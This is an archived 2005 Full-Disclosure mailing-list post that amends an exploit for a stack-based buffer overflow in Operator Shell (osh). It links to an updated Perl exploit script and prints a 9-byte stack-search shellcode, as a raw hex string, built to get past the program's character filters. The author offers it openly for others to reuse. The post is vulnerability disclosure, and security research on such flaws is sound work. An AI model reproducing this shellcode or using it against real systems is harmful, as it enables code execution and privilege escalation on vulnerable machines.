[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Operator Shell (osh) Stack-based Buffer Overflow Amendment

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Operator Shell (osh) Stack-based Buffer Overflow Amendment
From: core@xxxxxxxxxx (Charles Stevenson)
Date: Thu, 18 Aug 2005 04:32:40 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Andrewg managed to trim the shellcode to 9 bytes while still bypassing the
character filters a few hours after the first post.  I think this shellcode
might be of great benefit to others in the future.  Here's the amended
exploit:

http://bokeoa.com/~core/x_osh2.pl

Or if you just want the new stack search shellcode and don't care to
take the time to paste the URL here it is:

"\x61\x66\x3d\x90\x90\x75\xf9\x54\xc3"

peace,
core

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDBHHYGAuLrxOyeJMRAp9jAKCxFpDv39gCNC42WurL8I0NW/XhNwCeJZ1H
g+J+Uuzt5If6pQwJBPcpOOE=
=yF9k
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] morphed into certification argument (was : MS not telling enough - ethics)
Next by Date: RE: [Full-disclosure] Re: MS not telling enough
Previous by thread: [Full-disclosure] [ GLSA 200508-11 ] Adobe Reader: Buffer Overflow
Next by thread: [Full-disclosure] [USN-169-1] Linux kernel vulnerabilities
Index(es):
- Date
- Thread